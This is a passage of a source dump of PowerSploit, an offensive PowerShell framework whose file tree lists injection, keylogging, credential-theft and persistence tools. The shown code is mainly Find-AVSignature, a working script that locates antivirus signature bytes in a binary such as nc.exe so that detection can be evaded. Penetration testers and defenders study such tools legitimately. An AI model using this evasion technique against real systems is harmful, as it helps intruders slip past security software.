├── .gitignore
├── AntivirusBypass
    ├── AntivirusBypass.psd1
    ├── AntivirusBypass.psm1
    ├── Find-AVSignature.ps1
    └── Usage.md
├── CodeExecution
    ├── CodeExecution.psd1
    ├── CodeExecution.psm1
    ├── Invoke--Shellcode.ps1
    ├── Invoke-DllInjection.ps1
    ├── Invoke-ReflectivePEInjection.ps1
    ├── Invoke-ReflectivePEInjection_Resources
    │   ├── DemoDLL
    │   │   ├── DemoDLL.sln
    │   │   └── DemoDLL
    │   │   │   ├── DemoDLL.cpp
    │   │   │   ├── DemoDLL.h
    │   │   │   ├── DemoDLL.vcxproj
    │   │   │   ├── DemoDLL.vcxproj.filters
    │   │   │   ├── ReadMe.txt
    │   │   │   ├── dllmain.cpp
    │   │   │   ├── stdafx.cpp
    │   │   │   ├── stdafx.h
    │   │   │   └── targetver.h
    │   ├── DemoDLL_RemoteProcess
    │   │   ├── DemoDLL_RemoteProcess.sln
    │   │   └── DemoDLL_RemoteProcess
    │   │   │   ├── DemoDLL_RemoteProcess.cpp
    │   │   │   ├── DemoDLL_RemoteProcess.vcxproj
    │   │   │   ├── DemoDLL_RemoteProcess.vcxproj.filters
    │   │   │   ├── ReadMe.txt
    │   │   │   ├── dllmain.cpp
    │   │   │   ├── stdafx.cpp
    │   │   │   ├── stdafx.h
    │   │   │   └── targetver.h
    │   ├── DemoExe
    │   │   ├── DemoExe.sln
    │   │   ├── DemoExe_MD
    │   │   │   ├── DemoExe_MD.cpp
    │   │   │   ├── DemoExe_MD.vcxproj
    │   │   │   ├── DemoExe_MD.vcxproj.filters
    │   │   │   ├── ReadMe.txt
    │   │   │   ├── stdafx.cpp
    │   │   │   ├── stdafx.h
    │   │   │   └── targetver.h
    │   │   └── DemoExe_MDd
    │   │   │   ├── DemoExe_MDd.cpp
    │   │   │   ├── DemoExe_MDd.vcxproj
    │   │   │   ├── DemoExe_MDd.vcxproj.filters
    │   │   │   ├── ReadMe.txt
    │   │   │   ├── stdafx.cpp
    │   │   │   ├── stdafx.h
    │   │   │   └── targetver.h
    │   ├── ExeToInjectInTo
    │   │   ├── ExeToInjectInTo.sln
    │   │   └── ExeToInjectInTo
    │   │   │   ├── ExeToInjectInTo.cpp
    │   │   │   ├── ExeToInjectInTo.vcxproj
    │   │   │   ├── ExeToInjectInTo.vcxproj.filters
    │   │   │   ├── ReadMe.txt
    │   │   │   ├── stdafx.cpp
    │   │   │   ├── stdafx.h
    │   │   │   └── targetver.h
    │   └── Shellcode
    │   │   ├── readme.txt
    │   │   ├── x64
    │   │       ├── CallDllMain.asm
    │   │       ├── ExitThread.asm
    │   │       ├── GetFuncAddress.asm
    │   │       └── LoadLibraryA.asm
    │   │   └── x86
    │   │       ├── CallDllMain.asm
    │   │       ├── ExitThread.asm
    │   │       └── GetProcAddress.asm
    ├── Invoke-Shellcode.ps1
    ├── Invoke-ShellcodeMSIL.ps1
    └── Usage.md
├── Exfiltration
    ├── Exfiltration.psd1
    ├── Exfiltration.psm1
    ├── Get-GPPPassword.ps1
    ├── Get-Keystrokes.ps1
    ├── Get-TimedScreenshot.ps1
    ├── Get-VaultCredential.ps1
    ├── Get-VaultCredential.ps1xml
    ├── Invoke-CredentialInjection.ps1
    ├── Invoke-Mimikatz.ps1
    ├── Invoke-NinjaCopy.ps1
    ├── Invoke-TokenManipulation.ps1
    ├── LogonUser
    │   └── LogonUser
    │   │   ├── LogonUser.sln
    │   │   ├── LogonUser
    │   │       ├── LogonUser.cpp
    │   │       ├── LogonUser.vcxproj
    │   │       ├── LogonUser.vcxproj.filters
    │   │       ├── ReadMe.txt
    │   │       ├── stdafx.cpp
    │   │       ├── stdafx.h
    │   │       └── targetver.h
    │   │   └── logon
    │   │       ├── ReadMe.txt
    │   │       ├── dllmain.cpp
    │   │       ├── logon.cpp
    │   │       ├── logon.vcxproj
    │   │       ├── logon.vcxproj.filters
    │   │       ├── stdafx.cpp
    │   │       ├── stdafx.h
    │   │       └── targetver.h
    ├── NTFSParser
    │   ├── NTFSParser.sln
    │   ├── NTFSParser
    │   │   ├── NTFS.h
    │   │   ├── NTFSParser.cpp
    │   │   ├── NTFSParser.vcxproj
    │   │   ├── NTFSParser.vcxproj.filters
    │   │   ├── NTFS_Attribute.h
    │   │   ├── NTFS_Common.h
    │   │   ├── NTFS_DataType.h
    │   │   ├── NTFS_FileRecord.h
    │   │   ├── ReadMe.txt
    │   │   ├── stdafx.cpp
    │   │   ├── stdafx.h
    │   │   └── targetver.h
    │   └── NTFSParserDLL
    │   │   ├── NTFS.h
    │   │   ├── NTFSParserDLL.cpp
    │   │   ├── NTFSParserDLL.vcxproj
    │   │   ├── NTFSParserDLL.vcxproj.filters
    │   │   ├── NTFS_Attribute.h
    │   │   ├── NTFS_Common.h
    │   │   ├── NTFS_DataType.h
    │   │   ├── NTFS_FileRecord.h
    │   │   ├── ReadMe.txt
    │   │   ├── dllmain.cpp
    │   │   ├── stdafx.cpp
    │   │   ├── stdafx.h
    │   │   └── targetver.h
    ├── Out-Minidump.ps1
    ├── Usage.md
    └── VolumeShadowCopyTools.ps1
├── LICENSE
├── Mayhem
    ├── Mayhem.psd1
    ├── Mayhem.psm1
    └── Usage.md
├── Persistence
    ├── Persistence.psd1
    ├── Persistence.psm1
    └── Usage.md
├── PowerSploit.psd1
├── PowerSploit.psm1
├── README.md
├── Recon
    ├── Dictionaries
    │   ├── admin.txt
    │   ├── generic.txt
    │   └── sharepoint.txt
    ├── Get-ComputerDetails.ps1
    ├── Get-HttpStatus.ps1
    ├── Invoke-Portscan.ps1
    ├── Invoke-ReverseDnsLookup.ps1
    ├── Recon.psd1
    ├── Recon.psm1
    └── Usage.md
└── ScriptModification
    ├── Out-CompressedDll.ps1
    ├── Out-EncodedCommand.ps1
    ├── Out-EncryptedScript.ps1
    ├── Remove-Comments.ps1
    ├── ScriptModification.psd1
    ├── ScriptModification.psm1
    └── Usage.md


/.gitignore:
--------------------------------------------------------------------------------
  1 | #################
  2 | ## Eclipse
  3 | #################
  4 | 
  5 | *.pydevproject
  6 | .project
  7 | .metadata
  8 | bin/
  9 | tmp/
 10 | *.tmp
 11 | *.bak
 12 | *.swp
 13 | *~.nib
 14 | local.properties
 15 | .classpath
 16 | .settings/
 17 | .loadpath
 18 | 
 19 | # External tool builders
 20 | .externalToolBuilders/
 21 | 
 22 | # Locally stored "Eclipse launch configurations"
 23 | *.launch
 24 | 
 25 | # CDT-specific
 26 | .cproject
 27 | 
 28 | # PDT-specific
 29 | .buildpath
 30 | 
 31 | 
 32 | #################
 33 | ## Visual Studio
 34 | #################
 35 | 
 36 | ## Ignore Visual Studio temporary files, build results, and
 37 | ## files generated by popular Visual Studio add-ons.
 38 | 
 39 | # User-specific files
 40 | *.suo
 41 | *.user
 42 | *.sln.docstates
 43 | 
 44 | # Build results
 45 | 
 46 | [Dd]ebug/
 47 | [Rr]elease/
 48 | build/
 49 | [Bb]in/
 50 | [Oo]bj/
 51 | 
 52 | # MSTest test Results
 53 | [Tt]est[Rr]esult*/
 54 | [Bb]uild[Ll]og.*
 55 | 
 56 | *_i.c
 57 | *_p.c
 58 | *.ilk
 59 | *.meta
 60 | *.obj
 61 | *.pch
 62 | *.pdb
 63 | *.pgc
 64 | *.pgd
 65 | *.rsp
 66 | *.sbr
 67 | *.tlb
 68 | *.tli
 69 | *.tlh
 70 | *.tmp
 71 | *.tmp_proj
 72 | *.log
 73 | *.vspscc
 74 | *.vssscc
 75 | .builds
 76 | *.pidb
 77 | *.log
 78 | *.scc
 79 | 
 80 | # Visual C++ cache files
 81 | ipch/
 82 | *.aps
 83 | *.ncb
 84 | *.opensdf
 85 | *.sdf
 86 | *.cachefile
 87 | 
 88 | # Visual Studio profiler
 89 | *.psess
 90 | *.vsp
 91 | *.vspx
 92 | 
 93 | # Guidance Automation Toolkit
 94 | *.gpState
 95 | 
 96 | # ReSharper is a .NET coding add-in
 97 | _ReSharper*/
 98 | *.[Rr]e[Ss]harper
 99 | 
100 | # TeamCity is a build add-in
101 | _TeamCity*
102 | 
103 | # DotCover is a Code Coverage Tool
104 | *.dotCover
105 | 
106 | # NCrunch
107 | *.ncrunch*
108 | .*crunch*.local.xml
109 | 
110 | # Installshield output folder
111 | [Ee]xpress/
112 | 
113 | # DocProject is a documentation generator add-in
114 | DocProject/buildhelp/
115 | DocProject/Help/*.HxT
116 | DocProject/Help/*.HxC
117 | DocProject/Help/*.hhc
118 | DocProject/Help/*.hhk
119 | DocProject/Help/*.hhp
120 | DocProject/Help/Html2
121 | DocProject/Help/html
122 | 
123 | # Click-Once directory
124 | publish/
125 | 
126 | # Publish Web Output
127 | *.Publish.xml
128 | *.pubxml
129 | 
130 | # NuGet Packages Directory
131 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line
132 | #packages/
133 | 
134 | # Windows Azure Build Output
135 | csx
136 | *.build.csdef
137 | 
138 | # Windows Store app package directory
139 | AppPackages/
140 | 
141 | # Others
142 | sql/
143 | *.Cache
144 | ClientBin/
145 | [Ss]tyle[Cc]op.*
146 | ~$*
147 | *~
148 | *.dbmdl
149 | *.[Pp]ublish.xml
150 | *.pfx
151 | *.publishsettings
152 | 
153 | # RIA/Silverlight projects
154 | Generated_Code/
155 | 
156 | # Backup & report files from converting an old project file to a newer
157 | # Visual Studio version. Backup files are not needed, because we have git ;-)
158 | _UpgradeReport_Files/
159 | Backup*/
160 | UpgradeLog*.XML
161 | UpgradeLog*.htm
162 | 
163 | # SQL Server files
164 | App_Data/*.mdf
165 | App_Data/*.ldf
166 | 
167 | #############
168 | ## Windows detritus
169 | #############
170 | 
171 | # Windows image file caches
172 | Thumbs.db
173 | ehthumbs.db
174 | 
175 | # Folder config file
176 | Desktop.ini
177 | 
178 | # Recycle Bin used on file shares
179 | $RECYCLE.BIN/
180 | 
181 | # Mac crap
182 | .DS_Store
183 | 
184 | 
185 | #############
186 | ## Python
187 | #############
188 | 
189 | *.py[co]
190 | 
191 | # Packages
192 | *.egg
193 | *.egg-info
194 | dist/
195 | build/
196 | eggs/
197 | parts/
198 | var/
199 | sdist/
200 | develop-eggs/
201 | .installed.cfg
202 | 
203 | # Installer logs
204 | pip-log.txt
205 | 
206 | # Unit test / coverage reports
207 | .coverage
208 | .tox
209 | 
210 | #Translations
211 | *.mo
212 | 
213 | #Mr Developer
214 | .mr.developer.cfg
215 | 


--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'AntivirusBypass.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Name of the Windows PowerShell host required by this module
28 | # PowerShellHostName = ''
29 | 
30 | # Minimum version of the Windows PowerShell host required by this module
31 | # PowerShellHostVersion = ''
32 | 
33 | # Minimum version of the .NET Framework required by this module
34 | # DotNetFrameworkVersion = ''
35 | 
36 | # Minimum version of the common language runtime (CLR) required by this module
37 | # CLRVersion = ''
38 | 
39 | # Processor architecture (None, X86, Amd64) required by this module
40 | # ProcessorArchitecture = ''
41 | 
42 | # Modules that must be imported into the global environment prior to importing this module
43 | # RequiredModules = @()
44 | 
45 | # Assemblies that must be loaded prior to importing this module
46 | # RequiredAssemblies = @()
47 | 
48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module.
49 | # ScriptsToProcess = ''
50 | 
51 | # Type files (.ps1xml) to be loaded when importing this module
52 | # TypesToProcess = @()
53 | 
54 | # Format files (.ps1xml) to be loaded when importing this module
55 | # FormatsToProcess = @()
56 | 
57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
58 | # NestedModules = @()
59 | 
60 | # Functions to export from this module
61 | FunctionsToExport = '*'
62 | 
63 | # Cmdlets to export from this module
64 | CmdletsToExport = '*'
65 | 
66 | # Variables to export from this module
67 | VariablesToExport = ''
68 | 
69 | # Aliases to export from this module
70 | AliasesToExport = ''
71 | 
72 | # List of all modules packaged with this module.
73 | ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'})
74 | 
75 | # List of all files packaged with this module
76 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'
77 | 
78 | # Private data to pass to the module specified in RootModule/ModuleToProcess
79 | # PrivateData = ''
80 | 
81 | # HelpInfo URI of this module
82 | # HelpInfoURI = ''
83 | 
84 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
85 | # DefaultCommandPrefix = ''
86 | 
87 | }
88 | 


--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 | 


--------------------------------------------------------------------------------
/AntivirusBypass/Find-AVSignature.ps1:
--------------------------------------------------------------------------------
  1 | function Find-AVSignature
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Locate tiny AV signatures.
  7 | 
  8 | PowerSploit Function: Find-AVSignature
  9 | Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 | 
 14 | .DESCRIPTION
 15 | 
 16 | Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
 17 | 
 18 | .PARAMETER Startbyte
 19 | 
 20 | Specifies the first byte to begin splitting on.
 21 | 
 22 | .PARAMETER Endbyte
 23 | 
 24 | Specifies the last byte to split on.
 25 | 
 26 | .PARAMETER Interval
 27 | 
 28 | Specifies the interval size to split with.
 29 | 
 30 | .PARAMETER Path
 31 | 
 32 | Specifies the path to the binary you want tested.
 33 | 
 34 | .PARAMETER OutPath
 35 | 
 36 | Optionally specifies the directory to write the binaries to.
 37 | 
 38 | .PARAMETER BufferLen
 39 | 
 40 | Specifies the length of the file read buffer .  Defaults to 64KB.  
 41 | 
 42 | .PARAMETER Force
 43 | 
 44 | Forces the script to continue without confirmation.    
 45 | 
 46 | .EXAMPLE
 47 | 
 48 | PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe 
 49 | PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
 50 | PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
 51 | PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
 52 | PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
 53 | 
 54 | .NOTES
 55 | 
 56 | Several of the versions of "DSplit.exe" available on the internet contain malware.
 57 | 
 58 | .LINK
 59 | 
 60 | http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
 61 | https://github.com/mattifestation/PowerSploit
 62 | http://www.exploit-monday.com/
 63 | http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
 64 | #>
 65 | 
 66 |     [CmdletBinding()] Param(
 67 |         [Parameter(Mandatory = $True)]
 68 |         [ValidateRange(0,4294967295)]
 69 | 		[UInt32]
 70 |         $StartByte,
 71 | 
 72 |         [Parameter(Mandatory = $True)]
 73 |         [String]
 74 |         $EndByte,
 75 | 
 76 |         [Parameter(Mandatory = $True)]
 77 |         [ValidateRange(0,4294967295)]
 78 | 		[UInt32]
 79 |         $Interval,
 80 | 
 81 |         [String]
 82 | 		[ValidateScript({Test-Path $_ })]
 83 |         $Path = ($pwd.path),
 84 | 
 85 |         [String]
 86 |         $OutPath = ($pwd),
 87 | 		
 88 | 		
 89 | 		[ValidateRange(1,2097152)]
 90 | 		[UInt32]
 91 | 		$BufferLen = 65536,
 92 | 		
 93 |         [Switch] $Force
 94 | 		
 95 |     )
 96 | 
 97 |     #test variables
 98 |     if (!(Test-Path $Path)) {Throw "File path not found"}
 99 |     $Response = $True
100 |     if (!(Test-Path $OutPath)) {
101 |         if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory}
102 | 	}
103 |     if (!$Response) {Throw "Output path not found"}
104 |     if (!(Get-ChildItem $Path).Exists) {Throw "File not found"}
105 |     [Int32] $FileSize = (Get-ChildItem $Path).Length
106 |     if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"}
107 |     [Int32] $MaximumByte = (($FileSize) - 1)
108 |     if ($EndByte -ceq "max") {$EndByte = $MaximumByte}
109 | 	
110 | 	#Recast $Endbyte into an Integer so that it can be compared properly. 
111 | 	[Int32]$EndByte = $EndByte 
112 | 	
113 | 	#If $Endbyte is greater than the file Length, use $MaximumByte.
114 |     if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte}
115 | 	
116 | 	#If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte.
117 | 	if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval}
118 | 
119 | 	Write-Verbose "StartByte: $StartByte"
120 | 	Write-Verbose "EndByte: $EndByte"
121 | 	
122 |     #find the filename for the output name
123 |     [String] $FileName = (Split-Path $Path -leaf).Split('.')[0]
124 | 
125 |     #Calculate the number of binaries
126 |     [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval)
127 |     if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)}
128 |     
129 |     #Prompt user to verify parameters to avoid writing binaries to the wrong directory
130 |     $Response = $True
131 |     if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!",
132 |              "Do you want to continue?"))){}
133 |     if (!$Response) {Return}
134 |     
135 |     Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." 
136 |     [Int32] $Number = [Math]::Floor($Endbyte/$Interval)
137 |     
138 | 		#Create a Read Buffer and Stream. 
139 | 		#Note: The Filestream class takes advantage of internal .NET Buffering.  We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc.
140 | 		[Byte[]] $ReadBuffer=New-Object byte[] $BufferLen
141 | 		[System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)
142 | 		
143 |         #write out the calculated number of binaries
144 |         [Int32] $i = 0
145 |         for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++)
146 |         {
147 | 			# If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval
148 | 			if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte}
149 | 			else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))}
150 | 			
151 | 			Write-Verbose "Byte 0 -> $($SplitByte)"
152 | 			
153 | 			#Reset ReadStream to beginning of file
154 | 			$ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
155 | 			
156 | 			#Build a new FileStream for Writing
157 | 			[String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin"
158 | 			[System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)
159 | 			
160 | 			[Int32] $BytesLeft = $SplitByte
161 | 			Write-Verbose "$($WriteStream.name)"
162 | 			
163 | 			#Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer 
164 | 			while ($BytesLeft -gt $BufferLen){
165 | 				[Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen)
166 | 				$WriteStream.Write($ReadBuffer, 0, $count)
167 | 				$BytesLeft = $BytesLeft - $count
168 | 			}
169 | 			
170 | 			#Write the remaining bytes to the file 
171 | 			do {
172 | 				[Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft)
173 | 				$WriteStream.Write($ReadBuffer, 0, $count)
174 | 				$BytesLeft = $BytesLeft - $count			
175 | 			}
176 | 			until ($BytesLeft -eq 0)
177 | 			$WriteStream.Close()
178 | 			$WriteStream.Dispose()
179 |         }
180 |         Write-Verbose "Files written to disk. Flushing memory."
181 |         $ReadStream.Dispose()
182 |         
183 | 		#During testing using large binaries, memory usage was excessive so lets fix that
184 |         [System.GC]::Collect()
185 |         Write-Verbose "Completed!"
186 | }
187 | 


--------------------------------------------------------------------------------
/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module AntivirusBypass`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'CodeExecution.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Code Execution Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Name of the Windows PowerShell host required by this module
28 | # PowerShellHostName = ''
29 | 
30 | # Minimum version of the Windows PowerShell host required by this module
31 | # PowerShellHostVersion = ''
32 | 
33 | # Minimum version of the .NET Framework required by this module
34 | # DotNetFrameworkVersion = ''
35 | 
36 | # Minimum version of the common language runtime (CLR) required by this module
37 | # CLRVersion = ''
38 | 
39 | # Processor architecture (None, X86, Amd64) required by this module
40 | # ProcessorArchitecture = ''
41 | 
42 | # Modules that must be imported into the global environment prior to importing this module
43 | # RequiredModules = @()
44 | 
45 | # Assemblies that must be loaded prior to importing this module
46 | # RequiredAssemblies = @()
47 | 
48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module.
49 | # ScriptsToProcess = ''
50 | 
51 | # Type files (.ps1xml) to be loaded when importing this module
52 | # TypesToProcess = @()
53 | 
54 | # Format files (.ps1xml) to be loaded when importing this module
55 | # FormatsToProcess = @()
56 | 
57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
58 | # NestedModules = @()
59 | 
60 | # Functions to export from this module
61 | FunctionsToExport = '*'
62 | 
63 | # Cmdlets to export from this module
64 | CmdletsToExport = '*'
65 | 
66 | # Variables to export from this module
67 | VariablesToExport = ''
68 | 
69 | # Aliases to export from this module
70 | AliasesToExport = ''
71 | 
72 | # List of all modules packaged with this module.
73 | ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'})
74 | 
75 | # List of all files packaged with this module
76 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke--Shellcode.ps1', 'Invoke-DllInjection.ps1', 
77 |                'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
78 | 
79 | # Private data to pass to the module specified in RootModule/ModuleToProcess
80 | # PrivateData = ''
81 | 
82 | # HelpInfo URI of this module
83 | # HelpInfoURI = ''
84 | 
85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
86 | # DefaultCommandPrefix = ''
87 | 
88 | }
89 | 


--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | ? {$_.Name -ne 'Invoke-Shellcode.ps1'} | % { . $_.FullName}
2 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Debug|x64 = Debug|x64
10 | 		Release|Win32 = Release|Win32
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | 		{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | 	EndGlobalSection
23 | 	GlobalSection(SolutionProperties) = preSolution
24 | 		HideSolutionNode = FALSE
25 | 	EndGlobalSection
26 | EndGlobal
27 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
 1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | #include "DemoDLL.h"
 6 | 
 7 | using namespace std;
 8 | 
 9 | 
10 | extern "C" __declspec( dllexport ) char* StringFunc()
11 | {
12 | 	ostream *outputStream = NULL;
13 | 
14 | 	//If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.
15 | 	//outputStream = &cout;
16 | 
17 | 	ostringstream *stringStream = new ostringstream();
18 | 	outputStream = stringStream;
19 | 	
20 | 	(*outputStream) << "String DLL function is working" << endl << endl;
21 | 
22 | 	string output = (*stringStream).str();
23 | 	const char* outputStr = output.c_str();
24 | 
25 | 	char* out = new char[output.size()+1];
26 | 	strcpy(out, outputStr);
27 | 	out[output.size()] = '\0';
28 | 
29 | 
30 | 	return out;
31 | }
32 | 
33 | extern "C" __declspec( dllexport ) void VoidFunc()
34 | {
35 | 	printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
36 | 	return;
37 | }
38 | 
39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
40 | {
41 | 	wostream *outputStream = NULL;
42 | 
43 | 	//If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.
44 | 	outputStream = &wcout;
45 | 
46 | 	wostringstream *stringStream = new wostringstream();
47 | 	outputStream = stringStream;
48 | 	
49 | 	(*outputStream) << L"WString DLL function is working" << endl << endl;
50 | 
51 | 	wstring output = (*stringStream).str();
52 | 	const wchar_t* outputStr = output.c_str();
53 | 
54 | 	wchar_t* out = new wchar_t[output.size()+1];
55 | 	wcscpy(out, outputStr);
56 | 	out[output.size()] = '\0';
57 | 
58 | 
59 | 	return out;
60 | }


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
 1 | // The following ifdef block is the standard way of creating macros which make exporting 
 2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
 3 | // symbol defined on the command line. This symbol should not be defined on any project
 4 | // that uses this DLL. This way any other project whose source files include this file see 
 5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
 6 | // defined with this macro as being exported.
 7 | #ifdef DEMODLL_EXPORTS
 8 | #define DEMODLL_API __declspec(dllexport)
 9 | #else
